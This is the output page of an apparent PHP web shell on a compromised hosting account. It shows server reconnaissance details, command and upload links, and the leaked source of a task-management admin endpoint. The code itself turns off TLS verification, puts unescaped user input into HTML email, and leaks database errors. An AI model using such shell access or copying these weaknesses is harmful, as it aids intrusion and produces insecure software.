|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/public_html/rasi/../projects/config/../admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
session_start();
header('Content-Type: application/json');
error_reporting(E_ALL);
ini_set('display_errors', 0);
ini_set('log_errors', 1);
if (!isset($_SESSION['admin_id'])) {
echo json_encode(['success' => false, 'message' => 'Unauthorized']);
exit;
}
require_once '../config/config.php';
require_once '../config/db.php';
// Import PHPMailer
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
$autoload_paths = [
'../vendor/autoload.php',
'../../vendor/autoload.php',
'../../../vendor/autoload.php'
];
foreach ($autoload_paths as $path) {
if (file_exists($path)) {
require_once $path;
break;
}
}
$action = $_POST['action'] ?? '';
$current_user_id = $_SESSION['admin_id'];
$current_user_name = $_SESSION['user_name'] ?? 'Admin';
$current_user_role = $_SESSION['role'] ?? 'Employee';
// Only CEO and Manager can assign tasks
if ($current_user_role !== 'CEO' && $current_user_role !== 'Manager') {
echo json_encode(['success' => false, 'message' => 'You do not have permission to manage tasks']);
exit;
}
try {
switch ($action) {
case 'add':
addTask($con, $current_user_id, $current_user_name);
break;
case 'edit':
editTask($con, $current_user_id);
break;
case 'delete':
deleteTask($con);
break;
case 'get_subcategories':
getSubcategories($con);
break;
default:
throw new Exception('Invalid action');
}
} catch (Exception $e) {
echo json_encode(['success' => false, 'message' => $e->getMessage()]);
}
function getSubcategories($con) {
$category = mysqli_real_escape_string($con, $_POST['category'] ?? '');
if (empty($category)) {
echo json_encode(['success' => false, 'subcategories' => []]);
exit;
}
$query = "SELECT DISTINCT subcategory_name FROM tbl_categories WHERE category_name = '$category' ORDER BY subcategory_name ASC";
$result = mysqli_query($con, $query);
$subcategories = [];
while ($row = mysqli_fetch_assoc($result)) {
$subcategories[] = $row['subcategory_name'];
}
echo json_encode(['success' => true, 'subcategories' => $subcategories]);
}
function sendTaskEmail($employee_email, $employee_name, $task_title, $task_description, $category, $priority, $end_date, $assigned_by_name) {
if (!class_exists('PHPMailer\PHPMailer\PHPMailer')) {
error_log("PHPMailer not available");
return false;
}
try {
$mail = new PHPMailer(true);
$mail->SMTPDebug = 0;
$mail->isSMTP();
$mail->Host = SMTP_HOST;
$mail->SMTPAuth = true;
$mail->Username = SMTP_USERNAME;
$mail->Password = SMTP_PASSWORD;
$mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
$mail->Port = SMTP_PORT;
$mail->CharSet = 'UTF-8';
$mail->SMTPOptions = array(
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true
)
);
$mail->setFrom(SMTP_FROM_EMAIL, SMTP_FROM_NAME);
$mail->addAddress($employee_email, $employee_name);
$mail->addReplyTo(SMTP_FROM_EMAIL, SMTP_FROM_NAME);
$mail->isHTML(true);
$mail->Subject = 'New Task Assigned - ' . $task_title;
$formatted_end_date = date('F j, Y', strtotime($end_date));
$priority_color = [
'Low' => '#95a5a6',
'Medium' => '#3498db',
'High' => '#f39c12',
'Urgent' => '#e74c3c'
];
$mail->Body = "
<!DOCTYPE html>
<html>
<head>
<meta charset='UTF-8'>
</head>
<body style='font-family: Arial, sans-serif; line-height: 1.6; background: #f4f4f4; margin: 0; padding: 0;'>
<div style='max-width: 600px; margin: 20px auto; background: white; border-radius: 8px; overflow: hidden; box-shadow: 0 2px 10px rgba(0,0,0,0.1);'>
<div style='background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 30px; text-align: center;'>
<h1 style='margin:0; font-size: 24px;'>📋 New Task Assigned</h1>
</div>
<div style='padding: 30px;'>
<h2 style='color: #333; margin-top: 0;'>Hello $employee_name,</h2>
<p>You have been assigned a new task by <strong>$assigned_by_name</strong>.</p>
<div style='background: #f8f9fa; padding: 20px; margin: 20px 0; border-left: 4px solid #667eea; border-radius: 4px;'>
<h3 style='color: #667eea; margin-top:0;'>Task Details:</h3>
<p><strong>Task Title:</strong> $task_title</p>
<p><strong>Description:</strong> " . ($task_description ?: 'No description provided') . "</p>
" . ($category ? "<p><strong>Category:</strong> <span style='background: #e3f2fd; padding: 4px 8px; border-radius: 4px;'>$category</span></p>" : "") . "
<p><strong>Priority:</strong> <span style='background: " . $priority_color[$priority] . "; color: white; padding: 4px 8px; border-radius: 4px;'>$priority</span></p>
<p><strong>Deadline:</strong> <span style='color: #e74c3c; font-weight: bold;'>$formatted_end_date</span></p>
</div>
<p style='color: #666;'>Please make sure to complete this task before the deadline. If you have any questions, contact $assigned_by_name.</p>
<p>Best regards,<br><strong>TDS Projects Team</strong></p>
</div>
<div style='text-align: center; padding: 20px; color: #666; font-size: 14px; background: #f8f9fa;'>
<p>© " . date('Y') . " TheDotStudios. All rights reserved.</p>
<p>This is an automated email, please do not reply.</p>
</div>
</div>
</body>
</html>
";
$mail->AltBody = "New Task Assigned\n\nHello $employee_name,\n\nTask: $task_title\nCategory: $category\nPriority: $priority\nDeadline: $formatted_end_date\n\nAssigned by: $assigned_by_name";
$mail->send();
return true;
} catch (Exception $e) {
error_log("Email Error: " . $e->getMessage());
return false;
}
}
function addTask($con, $current_user_id, $current_user_name) {
$employee_id = intval($_POST['employee_id'] ?? 0);
$proposal_id = !empty($_POST['proposal_id']) ? intval($_POST['proposal_id']) : null;
$task_title = trim($_POST['task_title'] ?? '');
$task_description = trim($_POST['task_description'] ?? '');
$category = trim($_POST['category'] ?? '');
$subcategory = trim($_POST['subcategory'] ?? '');
$priority = $_POST['priority'] ?? 'Medium';
$tags = trim($_POST['tags'] ?? '');
$start_date = $_POST['start_date'] ?? null;
$end_date = $_POST['end_date'] ?? '';
// Required fields validation
if (empty($employee_id) || empty($proposal_id) || empty($task_title) || empty($task_description) ||
empty($category) || empty($subcategory) || empty($priority) || empty($start_date) || empty($end_date)) {
throw new Exception('All required fields must be filled');
}
if (strtotime($end_date) < strtotime(date('Y-m-d'))) {
throw new Exception('End date cannot be in the past');
}
if (strtotime($start_date) > strtotime($end_date)) {
throw new Exception('Start date cannot be after end date');
}
// Handle empty tags
if (empty($tags) || $tags === '[]') {
$tags = null;
}
// Get employee details
$emp_stmt = mysqli_prepare($con, "SELECT fname, email FROM tbl_user WHERE uid = ?");
mysqli_stmt_bind_param($emp_stmt, "i", $employee_id);
mysqli_stmt_execute($emp_stmt);
$emp_result = mysqli_stmt_get_result($emp_stmt);
$employee = mysqli_fetch_assoc($emp_result);
mysqli_stmt_close($emp_stmt);
if (!$employee) {
throw new Exception('Employee not found');
}
// Insert task
$stmt = mysqli_prepare($con,
"INSERT INTO tbl_tasks (employee_id, proposal_id, task_title, task_description, category, subcategory, priority, tags, start_date, end_date, status, assigned_by)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 'Pending', ?)"
);
mysqli_stmt_bind_param($stmt, "iissssssssi", $employee_id, $proposal_id, $task_title, $task_description, $category, $subcategory, $priority, $tags, $start_date, $end_date, $current_user_id);
if (mysqli_stmt_execute($stmt)) {
mysqli_stmt_close($stmt);
$email_sent = sendTaskEmail(
$employee['email'],
$employee['fname'],
$task_title,
$task_description,
$category,
$priority,
$end_date,
$current_user_name
);
if ($email_sent) {
echo json_encode([
'success' => true,
'message' => 'Task assigned successfully and email sent to ' . $employee['fname'] . '!'
]);
} else {
echo json_encode([
'success' => true,
'message' => 'Task assigned successfully but email failed to send. Please notify the employee manually.'
]);
}
} else {
mysqli_stmt_close($stmt);
throw new Exception('Failed to assign task: ' . mysqli_error($con));
}
}
function editTask($con, $current_user_id) {
$task_id = intval($_POST['task_id'] ?? 0);
$employee_id = intval($_POST['employee_id'] ?? 0);
$proposal_id = !empty($_POST['proposal_id']) ? intval($_POST['proposal_id']) : null;
$task_title = trim($_POST['task_title'] ?? '');
$task_description = trim($_POST['task_description'] ?? '');
$category = trim($_POST['category'] ?? '');
$subcategory = trim($_POST['subcategory'] ?? '');
$priority = $_POST['priority'] ?? 'Medium';
$tags = trim($_POST['tags'] ?? '');
$start_date = $_POST['start_date'] ?? null;
$end_date = $_POST['end_date'] ?? '';
$status = $_POST['status'] ?? 'Pending';
if ($task_id <= 0 || empty($employee_id) || empty($task_title) || empty($task_description) ||
empty($category) || empty($subcategory) || empty($start_date) || empty($end_date)) {
throw new Exception('All required fields must be filled');
}
// Handle empty tags
if (empty($tags) || $tags === '[]') {
$tags = null;
}
$stmt = mysqli_prepare($con,
"UPDATE tbl_tasks SET
employee_id = ?,
proposal_id = ?,
task_title = ?,
task_description = ?,
category = ?,
subcategory = ?,
priority = ?,
tags = ?,
start_date = ?,
end_date = ?,
status = ?
WHERE task_id = ?"
);
mysqli_stmt_bind_param($stmt, "iisssssssssi", $employee_id, $proposal_id, $task_title, $task_description, $category, $subcategory, $priority, $tags, $start_date, $end_date, $status, $task_id);
if (mysqli_stmt_execute($stmt)) {
mysqli_stmt_close($stmt);
echo json_encode(['success' => true, 'message' => 'Task updated successfully']);
} else {
mysqli_stmt_close($stmt);
throw new Exception('Failed to update task: ' . mysqli_error($con));
}
}
function deleteTask($con) {
$task_id = intval($_POST['task_id'] ?? 0);
if ($task_id <= 0) {
throw new Exception('Invalid task ID');
}
$stmt = mysqli_prepare($con, "DELETE FROM tbl_tasks WHERE task_id = ?");
mysqli_stmt_bind_param($stmt, "i", $task_id);
if (mysqli_stmt_execute($stmt)) {
mysqli_stmt_close($stmt);
echo json_encode(['success' => true, 'message' => 'Task deleted successfully']);
} else {
mysqli_stmt_close($stmt);
throw new Exception('Failed to delete task');
}
}
?>